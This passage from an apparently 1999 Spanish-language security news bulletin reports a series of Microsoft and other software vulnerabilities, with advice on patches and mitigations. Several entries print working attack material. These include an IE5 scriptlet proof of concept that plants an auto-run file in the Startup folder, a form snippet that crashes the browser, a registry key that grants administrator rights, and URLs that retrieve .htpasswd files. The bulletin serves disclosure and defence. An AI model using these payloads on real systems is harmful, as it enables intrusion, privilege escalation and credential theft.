martes, 31 de agosto de 1999

Los GUIDs y los MetaData en los documentos Microsoft Office (I)

El empleo, por parte de Microsoft, de GUID (Globally Unique ID) y
"MetaData" en sus documentos "Office", permite la identificación del
autor de un documento concreto, así como seguir su historia y obtener
otras informaciones de cuantioso valor.
Todos los documentos creados con alguno de los paquetes "Office"
(Microsoft Word, Excel, PowerPoint) incluye tanto un GUID como
información histórica sobre todas las modificaciones realizadas sobre
dicho fichero (llamada "MetaData"). Estos datos permiten inferir muchos
datos de interés.

Asimismo, el conocimiento (en estos momentos, público) sobre los
algoritmos empleados en "Office" para almacenar esas informaciones,
permite modificarlas de forma arbitraria, por lo que la falsificación se
convierte en algo trivial.

Microsoft ha publicado un documento justificando la existencia de GUID.
Hay que decir, no obstante, que no publica los detalles internos del
algoritmo, y que las razones con las que intenta justificar el empleo de
GUIDs son pueriles. Afortunadamente Microsoft proporciona dos utilidades
útiles. La primera permite eliminar los GUIDs de los documentos Office
ya creados. La segunda utilidad es un parche que evita que los programas
Office inserten GUIDs en los documentos que se creen a partir del
momento de su instalación.

En cuando a los "MetaData", mucha de esa información no es accesible
desde los propios programas Office, pero sí se puede leer utilizando un
editor de texto sencillo, un editor de disco, o una herramienta a tal
efecto. Algunas de las informaciones que se almacenan como "MetaData" en
los documentos Office son:

- El nombre del autor del documento, así como sus iniciales y el nombre
de la compañía para la que trabaja.

- Los nombres de todos los autores que contribuyeron al documento. Es
decir, el listado de personas que han editado y cambiado el documento.

- Información sobre revisiones y versiones, lo que permite tener acceso
a borradores anteriores del documento, por ejemplo. También se guarda
información sobre el número de palabras tecleadas y el tiempo empleado
en la edición.

- Comentarios y porciones no visibles de otros objetos OLE integrados.

- Etc.

Como puede verse, un documento Office (Word, Excel o PowerPoint) puede
filtrar muchísima más información que la que se muestra en pantalla. En
muchos casos esta información oculta puede comprometer la seguridad,
credibilidad o la privacidad de los autores del documento.

Baste con pensar, por ejemplo, en lo que puede suponer el que el
destinatario de un presupuesto comercial tenga acceso a borradores y
anotaciones supuestamente "eliminadas" en la redacción final. Lo mismo
se puede aplicar a informes internos dentro de una empresa, por ejemplo,
en los que se puede filtrar "hacia abajo" información confidencial que
fue editada al reducir el nivel de seguridad del documento.

Aunque no parece que exista un mecanismo simple para evitar la
propagación de "MetaData" y, con ello, la filtración de datos que ni
siquiera nosotros, los autores del documento, somos conscientes de que
estamos propagando, Microsoft proporciona algunas pistas en su web:

- Instalar el Office 97 Service Release 2 (SR-2).

- Desactivar la opción "Fast Save". Esta opción acelera la grabación
de los documentos mediante su grabación no compactada: los cambios son
añadidos al final del fichero, por lo que se tiene acceso a todo el
histórico. Si se elimina esta opción, el fichero se almacenará sólo
con la última versión del documento, no con los búferes temporales
empleados durante la edición.

Esta opción es especialmente delicada, ya que además de grabar en
disco texto que ya ha sido borrado en el documento, hace que el
fichero mida considerablemente más de lo que sería razonable pensar.

Además, en Office 97 se ha incluido la opción de almacenar los
documentos de fondo (background). Ello permite seguir trabajando con
el programa mientras éste está grabando el fichero en disco. Ello hace
que la opción "Fast Save" sea innecesaria, además de los riesgos de
seguridad que implica.

- Eliminar la grabación de la información sobre el autor de los
documentos creados con Office.

- Eliminar la grabación de la información de resumen, estadísticas, etc.

- Eliminar los comentarios del documento cuando se va a distribuir la
versión final.

- Eliminar las marcas de revisión

- Eliminar el texto, celdas y hojas de trabajo ocultas.

- Eliminar hiperenlaces a documentos internos.

- Eliminar versiones y revisiones del documento. Esta información es
interna al fichero, y debe eliminarse de forma explícita.

- Eliminar información sobre los autores previos.

- Eliminación de información "MetaData" de otros objetos OLE integrados.

- Eliminación del GUID del documento.

- Eliminación de referencias Visual Basic en los "macros".

- Etc.

Se pueden encontrar todos los pasos detallados en los enlaces web
presentes al final de este boletín.

Los documentos que Microsoft tiene en su web sobre la privacidad de sus
usuarios son una lectura obligada. Es sorprendente que a Microsoft se le
"cuelen" inadvertidamente tantos "bugs" relativos a temas de privacidad.
Quien sepa leer entre líneas...

Más información:

Cómo y por qué se crean GUIDs en los documentos Office
Microsoft Office 97 Service Release 2 (SR-2)
Microsoft Office 97 Unique Identifier Patch
Microsoft Office 97 Unique Identifier Removal Tool
How to Minimize Metadata in Microsoft Office 97 Documents
How to Minimize Metadata in Microsoft Word Documents
How to Minimize Metadata in Microsoft PowerPoint Presentations
How to Minimize Metadata in Microsoft Excel Workbooks
How to Disable de Fast Saves Option
Allow Fast Saves Option Not Selected by Default
Opening Word Document in Text Editor Displays Deleted Text
Change in Document File Size Is More or Less Than Expected
How to Change the Company property Information
Frequently Asked Questions About "Allow Fast Saves"
Word Does Not "Fast Save" Documents
Windows 98 Privacy Q&A
Microsoft Addresses Custormers' Privacy Concerns



Jesús Cea Avión
jcea@hispasec.com



lunes, 30 de agosto de 1999

Vulnerabilidades en dos controles ActiveX

Microsoft publica un nuevo boletín de seguridad junto con un
parche destinado a cubrir una vulnerabilidad en dos controles
ActiveX por la que a través de una página web se podía tener
acceso no autorizado sobre el visitante.
Esta nueva vulnerabilidad implica a dos controles ActiveX,
concretamente Scriptlet.typlib y Eyedog. Estos controles no están
de ninguna forma relacionados entre sí, su única relación está en
que ambos se encuentran etiquetados como "seguro para los
scripts" y por lo tanto pueden ejecutarse desde Internet
Explorer.

Scriptlet.typlib es un control que emplean los desarrolladores
para generar Type Libraries para Windows Script Components. Está
marcado como "seguro para los scripts", pero esto no es realmente
correcto ya que permite crear o modificar archivos locales. El
parche actúa sobre el script eliminando la marcha que lo acredita
como "seguro para scripts", asi IE solicitará la confirmación del
usuario.

El segundo control implicado es Eyedog, que se emplea en software
de diagnósticos en Windows. Al igual que el anterior está marcado
como "seguro para scripts", pero a través de él se permite el
acceso a la información del registro, y de esta forma recopilar
toda la información sobre dicha máquina. Además, uno de los
métodos de este control es vulnerable a un ataque de sobrecarga
de buffer.

Los peligros asociados a esta vulnerabilidad están limitados por
los privilegios de usuario en su máquina, ya que los controles
sólo pueden realizar acciones que el mismo usuario puede
efectuar.

Más información:
Parche para versiones en inglés de IE
Boletín de seguridad
Preguntas y respuestas sobre la vulnerabilidad



Antonio Ropero



domingo, 29 de agosto de 1999

Escalada de privilegios en NT con IBM GINA

La versión IBM de GINA para Windows NT, desarrollada para su
integración con OS/2, permite a cualquier usuario del sistema
llegar a conseguir privilegios de Administrador.
El inicio de sesión en Windows NT se controla por el proceso
Winlogon y la librería GINA de Microsoft (MSGINA.DLL). GINA,
que equivale a "Graphical Identification aNd Authentication",
es la interfaz gráfica que se utiliza en el proceso de inicio
de sesión por parte de Windows NT, al que el usuario accede
mediante la combinación de teclas Ctrl+Alt+Supr.

IBM ha desarrollado una nueva versión de GINA para Windows NT
que reemplaza a la de Microsoft y que permite a NT autentificarse
en dominios OS/2. La versión de IBM permite que cualquier usuario
con acceso local al sistema pueda obtener privilegios de
Administrador al introducir una nueva clave en el registro.

La creación de la clave:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
\Services\IBMNeTNT\GroupMapping
Valor: [Nombre del Grupo]
Tipo: Reg_SZ
Cadena: Administrators

provocará que, la próxima vez que se reinicie el equipo, los
usuarios pertenecientes al grupo introducido en lugar de [Nombre
de Grupo] tengan el perfil de Administradores, cuyos privilegios
le conceden el control total del sistema.

La opción de incluir grupos mediante la modificación del registro
se encuentra en la documentación de IBM que acompaña a su versión
de GINA, sin embargo no deja de ser un problema de seguridad ya
que por defecto cualquier usuario de Windows NT tiene permisos
para poder llevar a cabo la introducción de esta clave en el
registro.

Un simple cambio por parte del Administrador del sistema en las
propiedades de este objeto impedirá que se pueda llevar a cabo
la vulnerabilidad. Se aconseja dar derechos ilimitados al Sistema
y a los Administradores, y sólo derechos de lectura al grupo
Todos.

Más información:
Security Focus



Bernardo Quintero



sábado, 28 de agosto de 1999

30.000 millones para paliar el efecto 2000

Tras el desembolso multimillonario efectuado por la
administración española para paliar el efecto de la entrada del
milenio, aún quedan sectores estratégicos que no están
suficientemente preparados. Estos sectores son los de aviación
comercial y la sanidad autonómica.
Según afirman fuentes del gobierno, un 85% de los sistemas
informáticos de la administración están dispuestos para afrontar
el año 2000 sin errores. Con el fin de coordinar los sectores
públicos y privados el pasado día 27 de agosto el gobierno
anunció la creación de una Oficina de Transición para el Efecto
2000. Este nuevo centro de coordinación viene a sustituir a la
Comisión Nacional del Efecto 2000, y el periodo de coordinación
será de seis meses que comprenderán entre octubre de 1999 y
marzo del 2000.

Sectores como el nuclear y el de transporte marítimo están
preparados totalmente para el efecto 2000 y otros como los de
hidrocarburos poseen una adaptación del 95%. Así mismo, otro
sector con altos índices de preparación es el de ferrocarriles,
con una adaptación del 93%, mientras que la banca con un 90%
parece que tampoco tendrá problemas para tenerlo todo a punto
para el 31 de diciembre.

El panorama más inquietante viene por parte de la sanidad pública
que sólo dispone de un 50% de sus ordenadores preparados para
este perjudicial efecto. Otro problema añadido es el de las
Comunidades Autónomas que en un porcentaje del 30% no han
comenzado la adaptación, por lo cual el intercambio de
información entre administraciones nacionales y autónomas puede
dar al traste con los ya preparados ordenadores de la
administración estatal.

Más información:
El Mundo



Antonio Román



viernes, 27 de agosto de 1999

Visibles las cuentas FTP almacenadas por IE5/WinNT

En Windows NT los nombres de usuarios y contraseñas de los sitios
FTP, accedidos a través de Internet Explorer 5.x, son almacenados
en ficheros históricos sin ningún tipo de cifrado. La configuración
de los permisos que Windows NT trae por defecto permite que
cualquier usuario pueda acceder al fichero donde se almacena el
nombre de usuario y contraseña.
Por defecto, tras instalar Windows NT, el grupo Todos tiene
configurado "Saltarse la comprobación de recorridos" entre otros
derechos que podemos observar en el apartado de Derechos Avanzados.
Esta característica, en ocasiones olvidada, permite a cualquier
usuario acceder a rutas dedirectorios aun sin tener permiso en
ellos.

Esta peculiaridad habilita a cualquier usuario con acceso a un
sistema Windows NT que pueda leer los ficheros cuyos derechos
se lo permiten, aunque estén en directorios en principio no
accesibles.

Internet Explorer 5 almacena los nombres de usuario y sus
contraseñas en la trayectoria:
\Winnt\Profiles\[Username]\ History\History.IE5\index.dat.
Los directorios \Winnt\Profiles\[Username]\History están
configurados de forma segura por la Autoridad de Seguridad
Local (ACL), con derechos de Control Total para el Sistema,
el grupo Administradores y el usuario legítimo. Sin embargo, el
fichero index.dat se crea con derechos de Control Total para el
grupo Todos. A través de la característica de "Saltarse la
comprobación de recorridos" este fichero puede ser accesible para
cualquier usuario, con lo que tendrá acceso al nombre de usuario
y contraseña, en texto claro, utilizados en la autentificación a
sitios FTP.

Las soluciones, a la espera del pertinente parche, pasan por
deshabilitar la propiedad de "Saltarse la comprobación de
recorridos" para el grupo Todos, ajustar las propiedades del
fichero index.dat de forma que solo tengan acceso el propietario
y el grupo Administradores o, por último, utilizar un cliente de
FTP específico en vez del navegador de Microsoft.

Más información:
Security Focus



Bernardo Quintero



jueves, 26 de agosto de 1999

Acceso a cuentas de Hotmail sin contraseña

Dos sitios Web, uno en el Reino Unido y otro en Suecia,
permitían acceder a cualquier cuenta de Hotmail conociendo
su nombre de usuario, sin necesidad de suministrar la
contraseña.
Si nos ceñimos a las cifras que la propia Microsoft baraja
en sus estadísticas, el correo confidencial de los cerca de 50
millones de usuarios de Hotmail ha estado a disposición de
cualquiera. Con la única ayuda de un navegador, y conociendo
el nombre de usuario, se podía a través de esta vulnerabilidad
leer el correo, suplantar su identidad o cambiar la
configuración.


Un portavoz de Microsoft confirmó el hecho, "Una vez que
nos notificaron la noticia nos pusimos a investigar.
Encontramos que un cracker podía acceder a los servidores
de Hotmail a través de conocimientos avanzados en los
lenguajes de desarrollo Web. Nosotros desconectamos los
servidores en interés de la seguridad y privacidad del
usuario."

Los servidores vuelven a estar operativos, y Microsoft afirma
haber resuelto la vulnerabilidad. Todo parece indicar que el
problema partía de un bug presente en el script que procesaba
el inicio de sesión entre el navegador del usuario y el servidor.

Más información:
CNET
Wired



Bernardo Quintero



miércoles, 25 de agosto de 1999

Un formulario web puede colgar Internet Explorer 5

Internet Explorer 5 y Outlook Express 5 son incapaces de mostrar campos de formularios html de gran tamaño dentro de tablas, debido a esta deficiencia se pueden crear ataques de denegación de servicios.
El intento de visualizar una página web mal construida, que incluya un formulario dentro de una tabla pero con alguno de los campos de dicho formulario de un gran tamaño puede ocasionar que la aplicación se cuelgue al consumir el 100% de recursos de la CPU.

Unas simples líneas tan sencillas como:


<table>
<tr>
<td width="20%"><input type="text" name="State" size="99999999"
maxlength="99999999" value=""></td>
</tr>
</table>


pueden causar que Internet Explorer 5, bajo plataformas Windows 98, 2000 y NT se cuelgue. Si el mismo código se aplica sobre un mensaje html el Outlook Express 5 (bajo las mismas plataformas) del receptor se colgará de igual forma. Por el momento Microsoft no ha presentado ningún parche para este problema.


Más información:
Security Focus


Antonio Ropero



martes, 24 de agosto de 1999

Microsoft arregla su máquina virtual Java

Microsoft publica un parche para corregir una vulnerabilidad
existente en su Máquina Virtual Java. El problema puede llegar a
permitir a un applet de Java realizar cualquier acción en el
ordenador de un usuario que visite una página web maliciosa.
La Máquina Virtual Java de Microsoft o Microsoft VM es el entorno
que se ofrece para sistemas operativos basados en Win32, por lo
que funciona bajo Windows 95, 98 y Windows NT. Se distribuye como
parte de cada sistema operativo y además junto con Internet
Explorer. La versión de Microsoft VM que se distribuye junto con
Internet Explorer en sus versiones 4.0 y 5.0 contiene un agujero
de seguridad por el cual un applet puede llegar a operar fuera de
los límites marcados por la sandbox y realizar cualquier acción
en el ordenador del usuario.

Si un applet maligno se salta el control de la sandbox dispondrá
de todos los privilegios para crear, borrar o modificar archivos,
copiar datos o en general realizar cualquier acción para la que
esté programado. La vulnerabilidad no puede ser explotada de
forma accidental, ya que sólo es posible a través de una serie de
pasos cuidadosamente construidos.

Cualquier ordenador con Internet Explorer 4.0 o 5.0 tiene
instalada una versión vulnerable de la Máquina Virtual, por lo
que será necesaria la administración del parche distribuido por
Microsoft en la dirección
http://www.microsoft.com/java/vm/dl_vm32.htm.

Más información:
Boletín de Microsoft
Preguntas y respuestas sobre la vulnerabilidad
Parche



Antonio Ropero



lunes, 23 de agosto de 1999

Vulnerabilidades en las impresoras QMS 2060

Las impresoras de CrownNet, serie QMS 2060, permiten a los usuarios
de la red autentificarse mediante un nombre y su correspondiente
contraseña. El problema viene al permitir, por defecto, que el
usuario root se autentifique correctamente sin contraseña, aun
habiéndola configurado de forma explícita. En este caso sólo afecta
en principio al periférico, pero como veremos más adelante una
mala configuración de algunas impresoras puede poner en entredicho la
seguridad de todo el sistema.
Las impresoras QMS se sitúan en la categoría de los nuevos periféricos
inteligentes. A diferencia de las impresoras tradicionales, estos
dispositivos suelen venir equipados con procesadores, discos duros,
memoria en cantidad, tarjetas de red, y más componentes que los convierten
en auténticas máquinas autónomas equiparables a cualquier PC. Este
conjunto de características convierten a estos periféricos en máquinas
muy potentes y, al mismo tiempo, en foco de nuevas vulnerabilidades.

La serie QMS 2060, gama baja de CrownNet, viene dotada con un procesador
de 100Mhz, memoria RAM entre 16 y 48MB según modelo y, entre otros
componentes, todas poseen una tarjeta ethernet que les permite la
comunicación para recibir, a través de la red, los trabajos de impresión
desde los ordenadores de los usuarios.


CrownAdmin es una de las utilidades que acompaña a los modelos QMS 2060,
este programa permite administrar, configurar y actualizar de forma remota
las impresoras de la red. Según el manual, en el fichero passwords.ftp se
establecen los usuarios y sus correspondientes contraseñas, que permitirán
auntentificarse ante la impresora. La vulnerabilidad se presenta al admitir
siempre al usuario root sin contraseña alguna, aun habiéndose introducido
ésta en el fichero passwords.ftp. Esta característica permite a cualquiera
autentificarse como root y poder modificar a su antojo la configuración,
incluido permisos, de la impresora.

Aunque en esta ocasión tratamos una vulnerabilidad que se puede calificar
de bajo riesgo, se han llegado a conocer casos en los que a través de una
impresora se espiaba a una red local completa. En cierta ocasión, todos
los trabajos de impresión enviados a una impresora HP Jet Direct eran
reenviados realmente a un servidor en Internet que hacia de intermediario,
para luego dirigir de nuevo la impresión a la HP. Durante todo este proceso
el intruso que había manipulado el sistema podía tener acceso a toda la
información que se imprimía, y de la que guardaba una copia en el servidor
de Internet que hacía de intermediario.

Más información:

Bugtraq



Bernardo Quintero



domingo, 22 de agosto de 1999

Vulnerabilidad en Mini SQL

Una aplicación que acompaña al gestor de base de datos Mini SQL permite
acceder de forma remota a archivos de directorios protegidos en un
servidor web. El problema se agrava al poder utilizar esta vulnerabilidad
para acceder a los ficheros que contienen los datos que permiten
autentificarse a los usuarios legítimos.
Diseñado por Hughes Technologies, Mini SQL (mSQL) es un sencillo gestor
de base de datos relacionales. A partir de mSQL 2.0 acompaña al paquete
la herramienta w3-mSQL, que proporciona un lenguaje script para acceder
a la API de mSQL sin necesidad de utilizar etiquetas HTML.

En las versiones de Mini SQL 2.0 y 2.0.10, el CGI w3-msql permite acceder
a cualquiera, de forma remota, a ficheros que se encuentran en directorios
protegidos del servidor web. Basta con conocer el nombre del archivo para
poder obtenerlo con una sencilla petición:

http://www.servidor.com/cgi-bin/w3-msql/directorio_protegido/nombre_fichero

En el caso de que no se conozca el nombre del fichero, esta vulnerabilidad
permite visualizar el contenido de los directorios protegidos. Por ejemplo,
en Apache, se puede conseguir el archivo que contiene las contraseñas de
los usuarios autorizados con la petición:

http://www.servidor.com/cgi-bin/w3-msql/directorio_protegido/.htpasswd

El fichero obtenido contiene las contraseñas cifradas bajo DES, que pueden
ser descubiertas mediante ataques por diccionario, u otra modalidad,
llevados a cabo con cualquiera de las utilidades "crack" que circulan
al efecto. Con estas cuentas el atacante podrá autentificarse como un
usuario autorizado y acceder a la información privada.

Para los usuarios de Mini SQL la solución pasa por actualizar a la
versión 2.0.11 que corrige este problema y que se encuentra disponible
en su sitio web.

Más información:
HispaSec
Hughes Technologies
Bugtraq



Bernardo Quintero



sábado, 21 de agosto de 1999

Nueva vulnerabilidad en Explorer 5.0

Una vez más, el ya popular Georgi Guninski saca a la luz una
nueva vulnerabilidad del navegador Internet Explorer 5.0. Esta
vez se trata de algo tan peligroso como la posibilidad de
ejecutar aplicaciones de manera remota por medio de código
embebido en páginas HTML en forma de script.
Este problema se ha detectado en los sistemas Windows95 y 98,
y se desconoce por el momento si también afecta a WindowsNT.
La idea es tan sencilla como sobreescribir ficheros de las
máquinas remotas con código maligno y conseguir que alguno
de esos ficheros sea abierto y/o ejecutado de manera local.

Este agujero de seguridad viene dado por el control ActiveX
destinado a la construcción de librerías para scriptlets, y
su explotación ofrece innumerables posibilidades para quien
desee aprovecharse, tanto por medio de una página web en un
servidor remoto como incluso vía e-mail.

El scriptlet maligno programado por Guninski habla por sí
solo con respecto a la sencillez y, por consiguiente, la
peligrosidad intrínseca de la existencia de este agujero de
seguridad en Internet Explorer 5.0. Vemos en el siguiente
ejemplo cómo se puede crear un fichero en el directorio de
inicio de Windows, algo que forzaría la ejecución de dicho
fichero (que sería, por ejemplo, un virus HTML) en cada
arranque del sistema operativo.

<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object><script>
scr.Reset();
scr.Path="C:\\Windows\\Start Menu\\Programs\\StartUp\\Guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'>
</object><script>
alert('Written by Georgi Guninski http://www.nat.bg/~joro');
wsh.Run('c:\\command.com');</"+"script>";
scr.write();
</script></object>

A pesar de que a simple vista pueda parecer una hecatombe,
hay que tener en cuenta que es ya una costumbre recibir de
vez en cuando noticias de este tipo de la mano de una serie
de incansables buscadores de agujeros de seguridad, tales
como Cuartango o el propio Guninski. El tiempo se empeña en
demostrar que tanto escritores de virus como saboteadores
de sistemas prefieren optar por métodos más tradicionales,
apostando por estabilidad y compatibilidad en detrimento de
un posible aprovechamiento fugaz de ciertos agujeros de
seguridad, inherentes a una sola versión de una determinada
aplicación o sistema operativo y, desde luego, susceptibles
de un rápido parcheo.

En cualquier caso, y, a la espera de noticias por parte de
Microsoft, además de la habitual recomendación de no visitar
websites o páginas particulares de dudosa fiabilidad, está
la posibilidad de desactivar las opciones de script de IE
5.0, o bien la de evitar la ejecución de los controles y
plug-ins ActiveX.

Más información:
Georgi Guninski



Giorgio Talvanti



viernes, 20 de agosto de 1999

Microsoft publica un parche para la vulnerabilidad de Office

La vulnerabilidad descubierta recientemente por Juan Carlos
García Cuartango está dando mucho de que hablar, pero Microsoft
acaba de publicar el parche que soluciona esta eventualidad que
afecta a todos los equipos con Office instalado.
En diversas ocasiones ya nos hemos hecho eco de los problemas
ocasionados por este agujero asociado al ODBC y al motor Jet,
pero el parche de Microsoft se hacía esperar. Por fin, tras una
polémica espera Microsoft publica un parche que deberán instalar
todos los usuarios de Office 97 y Office 2000.

Los días previos a la aparición de este parche han estado
cargados con más polémica que nunca. Por una parte la publicación
del código que explotaba la vulnerabilidad volvió a generar el
diálogo sobre la conveniencia de hacer público este tipo de
información. Por otra parte, el reconocimiento por parte de
Microsoft (en contra de las primeras informaciones emitidas) de
que el bug también afecta a los usuarios de Windows 2000 ha
generado un nuevo debate al evidenciarse que Microsoft ocultó a
la opinión pública este fallo.

En el boletín de seguridad de Microsoft se ve que el problema
afecta a cualquier aplicación que haga uso del motor de bases de
datos Jet, y no sólo a Excel 97 como se informó en un principio.
Por ello, además de Microsoft Office se encuentran afectados
productos tan diversos como Microsoft Visual Studio, Microsoft
Project, Microsoft Publisher, Microsoft Streets & Trips, etc.

El parche viene a cubrir dos vulnerabilidades, la primera a
través del "VBA Shell" afecta a Jet 3.52 y todas las versiones
anteriores. Las búsquedas (query) en Jet pueden contener comandos
del sistema operativo, de forma que al procesar el query se
ejecutan los comandos introducidos y los resultados se emplean en
el resto de la búsqueda. Esto puede emplearse con propósitos
lícitos pero también puede ser explotado de forma maliciosa si se
emplean comandos dañinos. Por ejemplo, se puede obtener la hora
del sistema y buscar los registros de la última hora, o se puede
incluir en la consulta un comando para formatear el disco duro.

La segunda vulnerabilidad afecta a todas las versiones de Jet a
través de la característica conocida como "Text I-ISAM" que
permite a una consulta de base de datos escribir en un archivo de
texto. Esto es útil cuando la aplicación Jet se emplea junto con
otro programa que no permita el intercambio dinámico de datos. La
aplicación Jet escribirá los resultados en un archivo y la otra
aplicación leerá los resultados de dicho archivo. La
vulnerabilidad surge por que las consultas jet pueden escribir a
cualquier tipo de archivo, incluido los ficheros del sistema. De
tal forma que es posible construir una consulta que escriba datos
inválidos o incluso información destructiva en un archivo del
sistema.

Para eliminar la primera vulnerabilidad el parche trabaja creando
un entorno conocido como "caja de arena", similar al utilizado
para la ejecución de aplicaciones Java. Para la segunda
vulnerabilidad el parche especifica una lista de tipos de archivo
a los cuales las consultas no pueden escribir. Esta lista es
configurable por los usuarios que pueden modificarla en caso de
necesidad.

Para la instalación del parche, lo más sencillo es acudir a la
dirección de Actualizaciones de Office:
http://officeupdate.microsoft.com/articles/mdac_typ.htm

Más información:
HispaSec
HispaSec
Boletín de Microsoft
Preguntas y respuestas sobre el parche
Parche



Antonio Ropero



jueves, 19 de agosto de 1999

Todos los detalles sobre el agujero en Jet 3.5

Microsoft sigue sin publicar aun el parche para la grave
vulnerabilidad de la que informábamos hace unas semanas en torno
a Jet 3.5 y Excel 97, por la cual se podían conseguir control
total de un ordenador desde una página web o incluso un simple
e-mail. Dispuestos a presionar aun más se han hecho públicos
todos los datos para la realización del exploit.
HispaSec de la mano del propio descubridor del bug, Juan Carlos
García Cuartango, hacía público el problema nada más conocerse
este. La gravedad del bug, y el expreso deseo de Cuartango de
mantener los detalles técnicos del exploit como información
confidencial nos obligaron a no publicar ningún dato técnico.
Aunque ello no nos privó de explicar de las posibilidades que
podía dar este nuevo fallo.

Tras una larga espera, el parche de Microsoft sigue sin llegar, a
pesar de la gravedad del problema han pasado más de dos semanas
desde la publicación original del problema en todo el mundo y se
espera que Microsoft publique el parche en estos días. Por el
momento, los datos técnicos para la realización del exploit ya se
han hecho públicos en las listas internacionales de seguridad.
No sin las acostumbradas discusiones sobre la conveniencia o no
de la difusión del código maligno.

El código se basa en incrustar "Datos Externos" de Microsoft
Query que emplee una función SQL SELECT que contenga una función
shell con parámetros desde (FROM) cualquier fichero conocido. En
el Select se incluye una función shell, en donde los parámetros
son las acciones que se desean realizar, y el FROM es un archivo
conocido y existente en la máquina, por lo que se puede emplear
el config.sys. Hay que configurar la actualización del query para
que se realice cuando se abra la hoja de cálculo.

El exploit publicado se conecta al ftp de AmericaOnLine y se baja
el archivo de presentación, escribe un log de la sesión ftp y
termina por abrir el editor del registro. Como ya se comentó
anteriormente, el archivo Excel no contiene macros, por lo que no
hay ningún aviso de ejecución de macros. Hasta la fecha, ningún
antivirus es capaz de avisar sobre este peligro.

Este mismo exploit se puede cambiar de forma sencilla para que
formatee el disco duro o realice cualquier otra acción sin
ninguna alerta para el usuario. El mayor peligro radica en que es
posible incluir el xls para que se cargue de forma automática
desde una página web o con tan sólo abrir un e-mail.

Más información:
SecurityFocus



Antonio Ropero



miércoles, 18 de agosto de 1999

Overflow remoto con IE5 y Telnet en Windows 95/98

Los Windows 95 y 98, con las versiones específicas 5.00.2314.1003 y
5.00.2314.1003IC del Internet Explorer 5, son vulnerables ante un
ataque remoto que permitiría ejecutar cualquier código con tan sólo
visitar una página web.
Los ejecutables telnet.exe que vienen con Windows 95 (74,720Kb), y
en la distribución de Windows 98 (77.824 bytes, 11/05/98), son
vulnerables por buffer overflow. Mientras prepara el mensaje de
conexión fallida, existe un buffer de entrada no controlado que
puede ser desbordado al sobrepasar los 255 caracteres, provocando
el cierre de la aplicación y la posibilidad de ejecutar código
debido al desbordamiento.

Hasta aquí el buffer overflow sería local, pero la vulnerabilidad
se agrava al entrar en juego el navegador de Microsoft, dando la
posibilidad de realizar el ataque de forma remota.

Internet Explorer ejecuta de forma automática telnet.exe cuando
se pasan como direcciones las URLs tipo "rlogin:", "telnet:"
o "tn3270:". Las anteriores versiones de Internet Explorer sólo
permitían pasar dos parámetros en ese tipo de URLs, en las versiones
específicas comentadas ha desaparecido esa restricción y permiten
hasta 460 bytes como parámetros.

Esta longitud permite a un atacante crear una URL que ejecute telnet.exe
en la máquina de la víctima, y pasar como parámetros el código para
explotar el desbordamiento y ejecutar cualquier comando.

La solución, a la espera de un parche de Microsoft, pasa por mover
de directorio la aplicación telnet.exe de manera que Internet Explorer
no la encuentre cuando quiera ejecutarla, evitando así la posibilidad
del ataque remoto a través del navegador.

Más información:
Bugtraq



Bernardo Quintero



martes, 17 de agosto de 1999

Vulnerabilidades en el soporte de nombres de fichero DOS

Los sistemas Windows 95/98 y NT soportan nombres de ficheros largos,
así mismo mantienen la compatibilidad con los sistemas (8.3). El que
en los nuevos sistemas 32bits de Microsoft se puedan hacer llamadas
utilizando cualquiera de los dos métodos está provocando problemas
de seguridad.
En las anteriores versiones de DOS y Windows 16bits los nombres de
fichero podían estar compuestos por un máximo de 8 caracteres, seguidos
de un punto, y 3 caracteres más para la extensión ("fichero.exe"). Los
nuevos sistemas permiten el uso de nombres de ficheros largos, de hasta
255 caracteres. En los Windows 32bits, y para guardar compatibilidad
con versiones anteriores, es posible invocar a los ficheros por el
nombre largo o por una entrada corta truncada. Por ejemplo, el fichero
"nombreunpocolargo" de 17 caracteres puede ser también llamado como
"nombre~1" respetando el máximo de 8 caracteres de versiones anteriores.

El problema se presenta en diversos programas que no respetan las
politicas de seguridad impuestas a determinados ficheros o directorios
cuando son invocados por el método corto de truncar el nombre largo.

Por ejemplo, en Internet Information Server 4.0 (SP3) se pueden
configurar los directorios para que no listen sus contenidos a través
de la web. Si desactivamos el listado de directorio en
C:\inetpub\wwwroot\directoriolargo\ podremos comprobar que funciona
correctamente con el nombre largo, denegando el visualizar su contenido
a través del navegador mediante la dirección http://servidor/directoriolargo.
Sin embargo, si introducimos la dirección con el nombre del directorio
truncado, http://servidor/direct~1, obtendremos el listado.

La misma vulnerabilidad se presenta en los servidores vqServer 1.9,
Xitami 2.4d2, Cat Soft Serv-U 2.5, Netscape Enterprise Server 3.0
y Netscape FastTrack Server versiones 2.01 y 3.0.1. Donde las
restricciones aplicadas a los directorios con nombres largos son
ignoradas al llamarlos con la versión truncada.

En el caso del IIS 4.0 la solución pasa por tener actualizado Windows NT
con el SP4 o SP5. En muchos casos ocurre que, aun teniendo el pertinente
Service Pack instalado, el servidor continue manteniendo la vulnerabilidad,
ésto es debido a que la instalación posterior de paquetes de software
pueden hacer que partes de los parches sean sobreescritos con versiones
anteriores. Para evitar estas sorpresas es aconsejable reinstalar los
Service Pack después de cualquier instalación de software adicional en
el servidor.

En el caso de los servidores de Netscape ya existen parches disponibles.
Como medidas más generales, lo más cómodo a priori resulta utilizar
siempre nombres de ficheros cortos, con lo que desaparecen los problemas
de raíz. Algo similar puede lograrse al contrario, es decir, forzando
a Windows NT a que no pueda crear nombres de fichero truncados mediante
la siguiente entrada en el registro:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem
Variable: NtfsDisable8dot3NameCreation
Tipo: REG_DWORD
Valor: 1
Esta solución será válida en Windows NT que utilicen el sistema de
archivos NTFS, como contrapartida hay que indicar que no tiene caracter
retroactivo, no funcionará en volúmenes FAT, y dará problemas si se
utilizan aplicaciones de 16bits.

Más información:
Bugtraq



Bernardo Quintero



lunes, 16 de agosto de 1999

Escuchas y censura en Internet

El parlamento de Japón aprobó la semana pasada una polémica ley
que da derecho a los policías a interceptar las comunicaciones,
como pueden ser las llamadas telefónicas o los emails en Internet.
La justificación se enmarca dentro de las necesidades que los agentes
tienen para perseguir al crimen organizado.
En realidad se aprobaron tres leyes que tenían como fin la lucha
contra el crimen organizado pero, como era de esperar, la polémica
saltó en la que daba carta blanca a la interceptación de las
comunicaciones.

El gobierno insiste en que esta medida ayudará a los agentes, y que
sólo será utilizada en los casos en los que se vean implicados asuntos
